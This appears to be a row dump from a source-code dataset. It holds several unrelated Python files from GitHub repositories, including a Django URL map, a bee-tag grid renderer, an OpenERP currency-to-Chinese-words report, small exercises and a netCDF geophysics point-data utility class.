seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
26994135313
|
from django.urls import path
from Zoo import views
import templates
urlpatterns = [
path('login/', views.user_login, name='login'),
path('logout/',views.logout, name='logout'),
path('user_create/', views.user_create, name='user_create'),
path('index/', views.index, name='index'),
path('detail/<int:id>', views.animal_detail, name='animal_detail'),
path('animal_delete/<int:id>/', views.animal_delete, name='animal_delete'),
path('check/<int:id>', views.check, name='check'),
path('search/', views.search, name='search'),
path('search_filter/', views.search_filter, name='search_filter'),
path('write_log/<int:id>/', views.write_log, name='write_log'),
path('edit_log/<int:id>/', views.edit_log, name='edit_log'),
path('log_delete/<int:id>/', views.log_delete, name='log_delete'),
path('zone/<int:id>', views.zone, name='zone'),
]
|
klll2/Zoozoo1
|
Zoo/urls.py
|
urls.py
|
py
| 886 |
python
|
en
|
code
| 1 |
github-code
|
6
|
36647480067
|
import collections
from .pybeesgrid import TAG_SIZE, NUM_CONFIGS, NUM_MIDDLE_CELLS
from .pybeesgrid import GridGenerator, BadGridArtist, BlackWhiteArtist, \
MaskGridArtist, DepthMapArtist
from .pybeesgrid import drawGrids
from .pybeesgrid import INNER_BLACK_SEMICIRCLE, CELL_0_BLACK, CELL_1_BLACK, \
CELL_2_BLACK, CELL_3_BLACK, CELL_4_BLACK, CELL_5_BLACK, CELL_6_BLACK, \
CELL_7_BLACK, CELL_8_BLACK, CELL_9_BLACK, CELL_10_BLACK, CELL_11_BLACK, \
IGNORE, CELL_0_WHITE, CELL_1_WHITE, CELL_2_WHITE, CELL_3_WHITE, \
CELL_4_WHITE, CELL_5_WHITE, CELL_6_WHITE, CELL_7_WHITE, CELL_8_WHITE, \
CELL_9_WHITE, CELL_10_WHITE, CELL_11_WHITE, OUTER_WHITE_RING, \
INNER_WHITE_SEMICIRCLE
import numpy as np
import warnings
TAG_ID = ['bits']
TAG_CONFIG = ['z_rotation', 'y_rotation', 'x_rotation', 'center', 'radius']
TAG_STRUCTURE = ['inner_ring_radius', 'middle_ring_radius', 'outer_ring_radius', 'bulge_factor',
'focal_length']
TAG_LABEL_NAMES = TAG_ID + TAG_CONFIG + TAG_STRUCTURE
CONFIG_LABELS = ('z_rotation', 'y_rotation', 'x_rotation',
'center_x', 'center_y', 'radius')
CONFIG_ROTS = (
CONFIG_LABELS.index('z_rotation'),
CONFIG_LABELS.index('y_rotation'),
CONFIG_LABELS.index('x_rotation'),
)
CONFIG_CENTER = (
CONFIG_LABELS.index('center_x'),
CONFIG_LABELS.index('center_y'),
)
CONFIG_RADIUS = CONFIG_LABELS.index('radius')
MASK = collections.OrderedDict([
("INNER_BLACK_SEMICIRCLE", INNER_BLACK_SEMICIRCLE),
("CELL_0_BLACK", CELL_0_BLACK),
("CELL_1_BLACK", CELL_1_BLACK),
("CELL_2_BLACK", CELL_2_BLACK),
("CELL_3_BLACK", CELL_3_BLACK),
("CELL_4_BLACK", CELL_4_BLACK),
("CELL_5_BLACK", CELL_5_BLACK),
("CELL_6_BLACK", CELL_6_BLACK),
("CELL_7_BLACK", CELL_7_BLACK),
("CELL_8_BLACK", CELL_8_BLACK),
("CELL_9_BLACK", CELL_9_BLACK),
("CELL_10_BLACK", CELL_10_BLACK),
("CELL_11_BLACK", CELL_11_BLACK),
("IGNORE", IGNORE),
("CELL_0_WHITE", CELL_0_WHITE),
("CELL_1_WHITE", CELL_1_WHITE),
("CELL_2_WHITE", CELL_2_WHITE),
("CELL_3_WHITE", CELL_3_WHITE),
("CELL_4_WHITE", CELL_4_WHITE),
("CELL_5_WHITE", CELL_5_WHITE),
("CELL_6_WHITE", CELL_6_WHITE),
("CELL_7_WHITE", CELL_7_WHITE),
("CELL_8_WHITE", CELL_8_WHITE),
("CELL_9_WHITE", CELL_9_WHITE),
("CELL_10_WHITE", CELL_10_WHITE),
("CELL_11_WHITE", CELL_11_WHITE),
("OUTER_WHITE_RING", OUTER_WHITE_RING),
("INNER_WHITE_SEMICIRCLE", INNER_WHITE_SEMICIRCLE)
])
MASK_KEYS = list(MASK.keys())
CELLS_BLACK = MASK_KEYS[MASK_KEYS.index("CELL_0_BLACK"):MASK_KEYS.index("CELL_11_BLACK")+1]
MASK_BLACK = ["INNER_BLACK_SEMICIRCLE"] + CELLS_BLACK
CELLS_WHITE = MASK_KEYS[
MASK_KEYS.index("CELL_0_WHITE"):
MASK_KEYS.index("CELL_11_WHITE")+1]
MASK_WHITE = CELLS_WHITE + ["OUTER_WHITE_RING", "INNER_WHITE_SEMICIRCLE"]
def dtype_tag_params(nb_bits=12, with_structure=False):
keys = TAG_ID + TAG_CONFIG
if with_structure:
keys += TAG_STRUCTURE
reps = {key: 1 for key in keys}
reps['bits'] = nb_bits
reps['center'] = 2
return [(key, "({},)float32".format(n)) for key, n in reps.items()]
def draw_grids(params, with_structure='auto', scales=[1.], artist=None):
def get_positions(keys):
positions = {}
i = 0
for name in keys:
positions[name] = i
i += len(params[name][0])
return positions, i
def array_fill_by_keys(struct_arr, keys, positions, arr):
for name in keys:
b = positions[name]
e = b + len(struct_arr[name][0])
arr[:, b:e] = struct_arr[name]
if artist is None:
artist = BlackWhiteArtist(0, 255, 0, 1)
batch_size = len(params['bits'])
positions, size = get_positions(TAG_ID + TAG_CONFIG)
bits_and_config = np.zeros((batch_size, size), dtype=np.float32)
array_fill_by_keys(params, TAG_ID + TAG_CONFIG, positions, bits_and_config)
if with_structure == 'auto':
with_structure = all([struct_key in params.dtype.names for struct_key in TAG_STRUCTURE])
if with_structure:
struct_positions, struct_size = get_positions(TAG_STRUCTURE)
structure = np.zeros((batch_size, struct_size), dtype=np.float32)
array_fill_by_keys(params, TAG_STRUCTURE, struct_positions, structure)
structure = np.ascontiguousarray(structure)
else:
structure = None
bits_and_config = np.ascontiguousarray(bits_and_config)
if structure is not None and (structure == 0).all():
warnings.warn(
"draw_grids got a structure that is all zero. Did you use "
"`dtype_tag_params(with_structure=True)`"
" and forgot to set the structure?")
assert bits_and_config.dtype == np.float32
assert bits_and_config.flags['C_CONTIGUOUS']
return drawGrids(bits_and_config, structure, artist, scales)
def _normalize_angle(x):
x %= 2*np.pi
x = (x + 2*np.pi) % (2*np.pi)
x[x > np.pi] -= 2*np.pi
assert ((-np.pi <= x) & (x <= np.pi)).all()
return x
|
berleon/pybeesgrid
|
python/beesgrid/__init__.py
|
__init__.py
|
py
| 5,325 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23018030287
|
import time
from openerp.report import report_sxw
from openerp.osv import osv
class report_common(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context=None):
super(report_common, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'rmb_upper': self._rmb_upper,
})
def _rmb_upper(self, value):
"""
人民币大写
来自:http://topic.csdn.net/u/20091129/20/b778a93d-9f8f-4829-9297-d05b08a23f80.html
传入浮点类型的值返回 unicode 字符串
"""
rmbmap = [u"零", u"壹", u"贰", u"叁", u"肆", u"伍", u"陆", u"柒", u"捌", u"玖"]
unit = [u"分", u"角", u"元", u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"亿",
u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"兆"]
nums = map(int, list(str('%0.2f' % value).replace('.', '')))
words = []
zflag = 0 # 标记连续0次数,以删除万字,或适时插入零字
start = len(nums) - 3
for i in range(start, -3, -1): # 使i对应实际位数,负数为角分
if 0 != nums[start - i] or len(words) == 0:
if zflag:
words.append(rmbmap[0])
zflag = 0
words.append(rmbmap[nums[start - i]])
words.append(unit[i + 2])
elif 0 == i or (0 == i % 4 and zflag < 3): # 控制‘万/元’
words.append(unit[i + 2])
zflag = 0
else:
zflag += 1
if words[-1] != unit[0]: # 结尾非‘分’补整字
words.append(u"整")
return ''.join(words)
class report_vehicle_contract(osv.AbstractModel):
_name = 'report.vehicle_sales_contract_print.report_contract'
_inherit = 'report.abstract_report'
_template = 'vehicle_sales_contract_print.report_contract'
_wrapped_report_class = report_common
|
QinerTech/vehicle_sales
|
vehicle_sales_contract_print/report/report.py
|
report.py
|
py
| 2,001 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11481741965
|
import json
import random
while True:
inp = input("> ")
ints = {}
with open('intents.json', 'r') as f:
json.dump(f, ints)
try:
if ints[inp].type() == list:
val = random.choice(ints[inp])
else:
val = ints[inp]
print(val)
except:
print("I don't understand.")
|
poopcoder/Game
|
chat/code.py
|
code.py
|
py
| 341 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37080131599
|
def solution(s):
from collections import deque
answer = ''
s = deque(s)
while s:
a = s.popleft()
if answer:
if answer[-1] == ' ':
answer += a.upper()
else:
answer += a.lower()
else:
answer += a.upper()
return answer
|
JeonggonCho/algorithm
|
프로그래머스/lv2/12951. JadenCase 문자열 만들기/JadenCase 문자열 만들기.py
|
JadenCase 문자열 만들기.py
|
py
| 327 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24023635631
|
import sys
def parse_text(start_state, rules_for_state, fileinput_gen, file=None):
if file:
f = open(file, 'w+')
sys.stdout = f
line_number = 1
state = start_state
text = ''.join(fileinput_gen)
start_index = 0
end_index = len(text)
while start_index < end_index:
best_len = 0
best_rule = None
rules = rules_for_state[state]
regex = text[start_index:end_index]
for rule in rules:
length = rule.automate.satisfies(regex)
if length > best_len:
best_len = length
best_rule = rule
if best_rule:
accepted_text = regex[:best_len]
if best_rule.vrati_se is not None:
accepted_text = accepted_text[:best_rule.vrati_se]
start_index += best_rule.vrati_se
else:
start_index += len(accepted_text)
if best_rule.uniform_sign != '-':
print(best_rule.uniform_sign, line_number, accepted_text, sep=' ') #regex or accepted_text
if best_rule.udji_u_stanje:
state = best_rule.udji_u_stanje
if best_rule.novi_redak:
line_number += 1
else:
start_index += 1
f.close()
|
marinsokol5/ppj_lab
|
lab1_python/source/analizator/AnalizatorBackBone.py
|
AnalizatorBackBone.py
|
py
| 1,285 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8649505528
|
# 10845 : 큐
import sys
n = int(sys.stdin.readline()) # n 입력받기
arr = []
for i in range(n) : # n 번만큼 반복해서 명령어 입력받기
command = sys.stdin.readline().split()
func = command[0] # func : 명령어
if len(command) == 2 : # push : 명령어와 숫자가 동시에 들어올 때
arr.append(command[1]) # arr 배열에 원소 추가
else :
if func == 'pop' : # 명령어가 pop 일 때
if len(arr) != 0 :
print(arr[0])
arr.pop(0)
else :
print(-1)
elif func == 'size' : # 명령어가 size 일 때
print(len(arr))
elif func == 'empty' : # 명령어가 empty 일 때
print(1 if len(arr) == 0 else 0)
elif func == 'front' : # 명령어가 front 일 때
print(arr[0] if len(arr) != 0 else -1)
elif func == 'back' : # 명령어가 back 일 때
print(arr[-1] if len(arr) != 0 else -1)
# pop() : 맨 마지막 원소 삭제
# pop(0) : 맨 처음 원소 삭제
|
kimhn0605/BOJ
|
Algorithm/자료 구조/10845.py
|
10845.py
|
py
| 1,146 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
38760633775
|
import netCDF4
import numpy as np
import numexpr as ne
import math
import os
import sys
import re
import tempfile
from collections import OrderedDict
from pprint import pformat
from scipy.interpolate import griddata
from geophys_utils._crs_utils import transform_coords, get_utm_wkt, get_reprojected_bounds, get_spatial_ref_from_wkt
from geophys_utils._transect_utils import utm_coords, coords2distance
from geophys_utils._netcdf_utils import NetCDFUtils, METADATA_CRS
from geophys_utils._polygon_utils import points2convex_hull
from geophys_utils._concave_hull import concaveHull
from shapely.geometry import shape
from scipy.spatial.ckdtree import cKDTree
from shapely.geometry import Polygon, MultiPoint, MultiPolygon
from shapely.geometry.polygon import asPolygon
from shapely.geometry.base import BaseGeometry
from shapely.ops import transform
import shapely.wkt
import logging
# Setup logging handlers if required
logger = logging.getLogger(__name__) # Get logger
logger.setLevel(logging.INFO) # Initial logging level for this module
try:
import memcache
except ImportError:
logger.debug('Unable to import memcache. AWS-specific functionality will not be enabled')
memcache = None
# Default number of points to read per chunk when retrieving data
DEFAULT_READ_CHUNK_SIZE = 8192
# Set this to a number other than zero for testing
POINT_LIMIT = 0
# Metadata shape generation parameters
SHAPE_BUFFER_DISTANCE = 0.02 # Distance to buffer (kerf) shape out then in again (in degrees)
SHAPE_OFFSET = 0.0005 # Distance to buffer (kerf) final shape outwards (in degrees)
SHAPE_SIMPLIFY_TOLERANCE = 0.0005 # Length of shortest line in shape (in degrees)
SHAPE_MAX_POLYGONS=5
SHAPE_MAX_VERTICES=1000
SHAPE_ORDINATE_DECIMAL_PLACES = 6 # Number of decimal places for shape vertex ordinates
class NetCDFPointUtils(NetCDFUtils):
'''
NetCDFPointUtils class to do various fiddly things with NetCDF geophysics point data files.
'''
CACHE_VARIABLE_PARAMETERS = {'complevel': 4,
'zlib': True,
'fletcher32': True,
'shuffle': True,
'endian': 'little',
}
def __init__(self,
netcdf_dataset,
memcached_connection=None,
enable_disk_cache=None,
enable_memory_cache=True,
cache_path=None,
s3_bucket=None,
debug=False):
'''
NetCDFPointUtils Constructor
@parameter netcdf_dataset: netCDF4.Dataset object containing a point dataset
@parameter enable_disk_cache: Boolean parameter indicating whether local cache file should be used, or None for default
@parameter enable_memory_cache: Boolean parameter indicating whether values should be cached in memory or not.
@parameter debug: Boolean parameter indicating whether debug output should be turned on or not
'''
# Start of init function - Call inherited constructor first
super().__init__(netcdf_dataset=netcdf_dataset,
debug=debug
)
logger.debug('Running NetCDFPointUtils constructor')
if memcache is not None:
self.memcached_connection = memcached_connection
else:
self.memcached_connection = None
self.s3_bucket = s3_bucket
self.cache_path = cache_path or os.path.join(os.path.join(tempfile.gettempdir(), 'NetCDFPointUtils'),
re.sub('\W', '_', os.path.splitext(self.nc_path)[0])) + '_cache.nc'
self.cache_basename = os.path.join(self.cache_path,
re.sub('\W', '_', os.path.splitext(self.nc_path)[0]))
#logger.debug('self.cache_path')
#logger.debug(self.cache_path)
#logger.debug('self.cache_path: {}'.format(self.cache_path))
self.enable_memory_cache = enable_memory_cache
# If caching is not explicitly specified, enable it for OPeNDAP access
if enable_disk_cache is None:
self.enable_disk_cache = self.opendap
else:
self.enable_disk_cache = enable_disk_cache
# Initialise private property variables to None until set by property getter methods
self._xycoords = None
self._point_variables = None
self._data_variable_list = None
self._kdtree = None
# Determine exact spatial bounds
xycoords = self.xycoords
xmin = np.nanmin(xycoords[:,0])
xmax = np.nanmax(xycoords[:,0])
ymin = np.nanmin(xycoords[:,1])
ymax = np.nanmax(xycoords[:,1])
# Create nested list of bounding box corner coordinates
self.native_bbox = [[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]]
# Define bounds
self.bounds = [xmin, ymin, xmax, ymax]
self.point_count = self.netcdf_dataset.dimensions['point'].size
#===========================================================================
# def __del__(self):
# '''
# NetCDFPointUtils Destructor
# '''
# if self.enable_disk_cache:
# try:
# cache_file_path = self._nc_cache_dataset.filepath()
# self._nc_cache_dataset.close()
# os.remove(cache_file_path)
# except:
# pass
#===========================================================================
def fetch_array(self, source_variable, dest_array=None):
'''
Helper function to retrieve entire 1D array in pieces < self.max_bytes in size
@param source_variable: netCDF variable from which to retrieve data
'''
source_len = source_variable.shape[0]
pieces_required = int(math.ceil((source_variable[0].itemsize * source_len) / self.max_bytes))
max_elements = source_len // pieces_required
# Reduce max_elements to fit within chunk boundaries if possible
if pieces_required > 1 and hasattr(source_variable, '_ChunkSizes'):
chunk_size = (source_variable._ChunkSizes
if type(source_variable._ChunkSizes) in [int, np.int32]
else source_variable._ChunkSizes[0]
)
chunk_count = max(max_elements // chunk_size,
1)
max_elements = min(chunk_count * chunk_size,
max_elements)
pieces_required = int(math.ceil(source_len / max_elements))
logger.debug('Fetching {} pieces containing up to {} {} array elements.'.format(pieces_required, max_elements, source_variable.name))
if dest_array is None:
dest_array = np.zeros((source_len,), dtype=source_variable.dtype)
# Copy array in pieces
start_index = 0
while start_index < source_len:
end_index = min(start_index + max_elements, source_len)
logger.debug('Retrieving {} array elements {}:{}'.format(source_variable.name, start_index, end_index))
array_slice = slice(start_index, end_index)
dest_array[array_slice] = source_variable[array_slice]
start_index += max_elements
return dest_array
def get_polygon(self):
'''
Returns GML representation of convex hull polygon for dataset
'''
return 'POLYGON((' + ', '.join([' '.join(
['%.4f' % ordinate for ordinate in coordinates])
for coordinates in self.get_convex_hull()]) + '))'
def get_spatial_mask(self, bounds, bounds_wkt=None):
'''
Return boolean mask of dimension 'point' for all coordinates within specified bounds and CRS
@parameter bounds: Either an iterable containing [<xmin>, <ymin>, <xmax>, <ymax>] or a shapely (multi)polygon
@parameter bounds_wkt: WKT for bounds CRS. Defaults to dataset native CRS
:return mask: Boolean array of size n
'''
#TODO: Deal with this in a more high-level way
POINT_CHUNK_SIZE = 1048576 # Number of points to check at any one time to keep memory usage down
def get_intersection_mask(points, geometry):
"""
Determine if points lie inside (multi)polygon
N.B: points and geometry must be in the same CRS
:param points: 2 x n array of input coordinates
:param geometry: (multi)polygon
:return mask: Boolean array of size n
"""
mask = np.zeros(shape=(points.shape[0]), dtype=np.bool)
chunk_start_index = 0
while chunk_start_index < len(points):
chunk_end_index = min(chunk_start_index + POINT_CHUNK_SIZE, len(points))
logger.debug('Checking spatial containment for points {} to {} of {}'.format(chunk_start_index, chunk_end_index-1, len(points)))
intersection_points = np.array(MultiPoint(points[slice(chunk_start_index, chunk_end_index)]).intersection(geometry))
#TODO: Find out if there's a better way of getting the mask from the intersection points
# Note that this method would have some issues with duplicated coordinates, but there shouldn't be any
logger.debug('Computing partial mask from {} intersection points'.format(len(intersection_points)))
_x_values, x_indices, _x_intersection_indices = np.intersect1d(points.flatten()[0::2], intersection_points.flatten()[0::2], return_indices=True)
_y_values, y_indices, _y_intersection_indices = np.intersect1d(points.flatten()[1::2], intersection_points.flatten()[1::2], return_indices=True)
intersection_indices = np.intersect1d(x_indices, y_indices, return_indices=False)
mask[intersection_indices] = True
chunk_start_index = chunk_end_index
return mask
coordinates = self.xycoords # Don't transform these - do all spatial operations in native CRS
#logger.debug('coordinates = {}'.format(coordinates))
if isinstance(bounds, BaseGeometry): # Process shapely (multi)polygon bounds
if bounds_wkt is None:
native_crs_bounds = bounds
else:
logger.debug('Original bounds = {}'.format(bounds))
native_crs_bounds = transform((lambda x, y: transform_coords([x, y], bounds_wkt, self.wkt)),
bounds)
logger.debug('native_crs_bounds = {}'.format(native_crs_bounds))
# Shortcut the whole process if the extents are within the bounds geometry
if asPolygon(self.native_bbox).within(native_crs_bounds):
logger.debug('Dataset is completely contained within bounds')
return np.ones(shape=(len(coordinates),), dtype=np.bool)
bounds_half_size = abs(np.array([native_crs_bounds.bounds[2] - native_crs_bounds.bounds[0],
native_crs_bounds.bounds[3] - native_crs_bounds.bounds[1]])) / 2.0
bounds_centroid = np.array(native_crs_bounds.centroid.coords[0])
#logger.debug('bounds_half_size = {}, bounds_centroid = {}'.format(bounds_half_size, bounds_centroid))
# Limit the points checked to those within the same rectangular extent (for speed)
# Set mask element to true for each point which is <= bounds_half_size distance from bounds_centroid
mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1)
logger.debug('{}/{} points found in initial bounding box intersection'.format(np.count_nonzero(mask), len(coordinates)))
# Apply sub-mask for all points within bounds geometry
(mask[mask])[~get_intersection_mask(coordinates[mask], native_crs_bounds)] = False
#logger.debug('Final shape mask = {}'.format(mask))
else: # Process four-element bounds iterable if possible
assert len(bounds) == 4, 'Invalid bounds iterable: {}. Must be of form [<xmin>, <ymin>, <xmax>, <ymax>]'.format(bounds)
native_crs_bounds = transform_coords(np.array(bounds).reshape((2,2)), bounds_wkt, self.wkt).reshape((4, 1)) # Transform as [xmin, ymin], [xmax, ymax]]
if (self.bounds[0] >= native_crs_bounds[0]
and self.bounds[1] >= native_crs_bounds[1]
and self.bounds[2] <= native_crs_bounds[2]
and self.bounds[3] <= native_crs_bounds[3]
):
logger.debug('Dataset is completely contained within bounds')
return np.ones(shape=(len(coordinates),), dtype=np.bool)
bounds_half_size = abs(np.array([native_crs_bounds[2] - native_crs_bounds[0], native_crs_bounds[3] - native_crs_bounds[1]])) / 2.0
bounds_centroid = np.array([native_crs_bounds[0], native_crs_bounds[1]]) + bounds_half_size
# Return true for each point which is <= bounds_half_size distance from bounds_centroid
mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1)
logger.debug('{}/{} points found in final mask'.format(np.count_nonzero(mask), len(coordinates)))
return mask
def grid_points(self, grid_resolution,
variables=None,
native_grid_bounds=None,
reprojected_grid_bounds=None,
resampling_method='linear',
grid_wkt=None,
point_step=1):
'''
Function to grid points in a specified bounding rectangle to a regular grid of the specified resolution and crs
@parameter grid_resolution: cell size of regular grid in grid CRS units
@parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables
@parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates
@parameter reprojected_grid_bounds: Spatial bounding box of area to grid in grid coordinates
@parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'.
See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html
@parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS
@parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc.
@return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or
a single grid array if 'variable' parameter value was a string
@return wkt: WKT for grid coordinate reference system.
@return geotransform: GDAL GeoTransform for grid
'''
assert not (native_grid_bounds and reprojected_grid_bounds), 'Either native_grid_bounds or reprojected_grid_bounds can be provided, but not both'
# Grid all data variables if not specified
variables = variables or self.point_variables
# Allow single variable to be given as a string
single_var = (type(variables) == str)
if single_var:
variables = [variables]
if native_grid_bounds:
reprojected_grid_bounds = get_reprojected_bounds(native_grid_bounds, self.wkt, grid_wkt)
elif reprojected_grid_bounds:
native_grid_bounds = get_reprojected_bounds(reprojected_grid_bounds, grid_wkt, self.wkt)
else: # No reprojection required
native_grid_bounds = self.bounds
reprojected_grid_bounds = self.bounds
# Determine spatial grid bounds rounded out to nearest GRID_RESOLUTION multiple
pixel_centre_bounds = (round(math.floor(reprojected_grid_bounds[0] / grid_resolution) * grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[1] / grid_resolution) * grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[2] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[3] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6)
)
grid_size = [pixel_centre_bounds[dim_index+2] - pixel_centre_bounds[dim_index] for dim_index in range(2)]
# Extend area for points an arbitrary 4% out beyond grid extents for nice interpolation at edges
expanded_grid_bounds = [pixel_centre_bounds[0]-grid_size[0]/50.0,
pixel_centre_bounds[1]-grid_size[0]/50.0,
pixel_centre_bounds[2]+grid_size[1]/50.0,
pixel_centre_bounds[3]+grid_size[1]/50.0
]
spatial_subset_mask = self.get_spatial_mask(get_reprojected_bounds(expanded_grid_bounds, grid_wkt, self.wkt))
# Create grids of Y and X values. Note YX ordering and inverted Y
# Note GRID_RESOLUTION/2.0 fudge to avoid truncation due to rounding error
grid_y, grid_x = np.mgrid[pixel_centre_bounds[3]:pixel_centre_bounds[1]-grid_resolution/2.0:-grid_resolution,
pixel_centre_bounds[0]:pixel_centre_bounds[2]+grid_resolution/2.0:grid_resolution]
# Skip points to reduce memory requirements
#TODO: Implement function which grids spatial subsets.
point_subset_mask = np.zeros(shape=(self.netcdf_dataset.dimensions['point'].size,), dtype=bool)
point_subset_mask[0:-1:point_step] = True
point_subset_mask = np.logical_and(spatial_subset_mask, point_subset_mask)
coordinates = self.xycoords[point_subset_mask]
# Reproject coordinates if required
if grid_wkt is not None:
# N.B: Be careful about XY vs YX coordinate order
coordinates = np.array(transform_coords(coordinates[:], self.wkt, grid_wkt))
# Interpolate required values to the grid - Note YX ordering for image
grids = {}
for variable in [self.netcdf_dataset.variables[var_name] for var_name in variables]:
grids[variable.name] = griddata(coordinates[:,::-1],
variable[:][point_subset_mask], #TODO: Check why this is faster than direct indexing
(grid_y, grid_x),
method=resampling_method)
if single_var:
grids = list(grids.values())[0]
# crs:GeoTransform = "109.1002342895272 0.00833333 0 -9.354948067227777 0 -0.00833333 "
geotransform = [pixel_centre_bounds[0]-grid_resolution/2.0,
grid_resolution,
0,
pixel_centre_bounds[3]+grid_resolution/2.0,
0,
-grid_resolution
]
return grids, (grid_wkt or self.wkt), geotransform
def utm_grid_points(self, utm_grid_resolution, variables=None, native_grid_bounds=None, resampling_method='linear', point_step=1):
'''
Function to grid points in a specified native bounding rectangle to a regular grid of the specified resolution in its local UTM CRS
@parameter grid_resolution: cell size of regular grid in metres (UTM units)
@parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables
@parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates
@parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'.
See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html
@parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS
@parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc.
@return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or
a single grid array if 'variable' parameter value was a string
@return wkt: WKT for grid coordinate reference system (i.e. local UTM zone)
@return geotransform: GDAL GeoTransform for grid
'''
native_grid_bounds = native_grid_bounds or self.bounds
native_centre_coords = [(native_grid_bounds[dim_index] + native_grid_bounds[dim_index+2]) / 2.0 for dim_index in range(2)]
utm_wkt = get_utm_wkt(native_centre_coords, self.wkt)
return self.grid_points(grid_resolution=utm_grid_resolution,
variables=variables,
native_grid_bounds=native_grid_bounds,
resampling_method=resampling_method,
grid_wkt=utm_wkt,
point_step=point_step
)
def utm_coords(self, coordinate_array, wkt=None):
'''
Function to convert coordinates to the appropriate UTM CRS
@param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs
@param wkt: WKT for source CRS - default to native
@return wkt: WKT for UTM CRS - default to native
@return coordinate_array: Array of shape (n, 2) containing UTM coordinate pairs
'''
wkt = wkt or self.wkt
return utm_coords(coordinate_array, wkt)
def coords2metres(self, coordinate_array, wkt=None):
'''
Function to calculate cumulative distance in metres from coordinates in specified CRS
@param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs
@param wkt: WKT for coordinate CRS - default to native
@return distance_array: Array of shape (n) containing cumulative distances from first coord
'''
wkt = wkt or self.wkt # Default to native CRS for coordinates
_utm_wkt, utm_coord_array = utm_coords(coordinate_array, wkt)
return coords2distance(utm_coord_array)
def get_convex_hull(self, to_wkt=None):
'''
Function to return vertex coordinates of a convex hull polygon around all points
Implements abstract base function in NetCDFUtils
@param to_wkt: CRS WKT for shape
'''
return points2convex_hull(transform_coords(self.xycoords, self.wkt, to_wkt))
def get_concave_hull(self, to_wkt=None, smoothness=None, clockwise_polygon_orient=False):
"""\
Returns the concave hull (as a shapely polygon) of all points.
Implements abstract base function in NetCDFUtils
@param to_wkt: CRS WKT for shape
@param smoothness: distance to buffer (kerf) initial shape outwards then inwards to simplify it
"""
hull = concaveHull(transform_coords(self.xycoords, self.wkt, to_wkt))
shapely_polygon = shape({'type': 'Polygon', 'coordinates': [hull.tolist()]})
# from shapely docs:
# A sign of 1.0 means that the coordinates of the product’s exterior ring will be oriented
# counter-clockwise and the interior rings (holes) will be oriented clockwise.
#
# There should not be polygons with interior ring holes and so -1 will be treated as clockwise, and 1 as
# counter-clockwise
if clockwise_polygon_orient:
pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), -1.0)
else: # reverse polygon coordinates - anti-clockwise
pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), 1.0)
if smoothness is None:
return pol
return Polygon(pol.buffer(smoothness).exterior).buffer(-smoothness)
def nearest_neighbours(self, coordinates,
wkt=None,
points_required=1,
max_distance=None,
secondary_mask=None):
'''
Function to determine nearest neighbours using cKDTree
N.B: All distances are expressed in the native dataset CRS
@param coordinates: two-element XY coordinate tuple, list or array
@param wkt: Well-known text of coordinate CRS - defaults to native dataset CRS
@param points_required: Number of points to retrieve. Default=1
@param max_distance: Maximum distance to search from target coordinate -
STRONGLY ADVISED TO SPECIFY SENSIBLE VALUE OF max_distance TO LIMIT SEARCH AREA
@param secondary_mask: Boolean array of same shape as point array used to filter points. None = no filter.
@return distances: distances from the target coordinate for each of the points_required nearest points
@return indices: point indices for each of the points_required nearest points
'''
if wkt:
reprojected_coords = transform_coords(coordinates, wkt, self.wkt)
else:
reprojected_coords = coordinates
if secondary_mask is None:
secondary_mask = np.ones(shape=(self.point_count,), dtype=bool)
else:
assert secondary_mask.shape == (self.point_count,)
if max_distance: # max_distance has been specified
logger.debug('Computing spatial subset mask...')
spatial_mask = self.get_spatial_mask([reprojected_coords[0] - max_distance,
reprojected_coords[1] - max_distance,
reprojected_coords[0] + max_distance,
reprojected_coords[1] + max_distance
]
)
point_indices = np.where(np.logical_and(spatial_mask,
secondary_mask
)
)[0]
if not len(point_indices):
logger.debug('No points within distance {} of {}'.format(max_distance, reprojected_coords))
return [], []
# Set up KDTree for nearest neighbour queries
logger.debug('Indexing spatial subset with {} points into KDTree...'.format(np.count_nonzero(spatial_mask)))
kdtree = cKDTree(data=self.xycoords[point_indices])
logger.debug('Finished indexing spatial subset into KDTree.')
else: # Consider ALL points
max_distance = np.inf
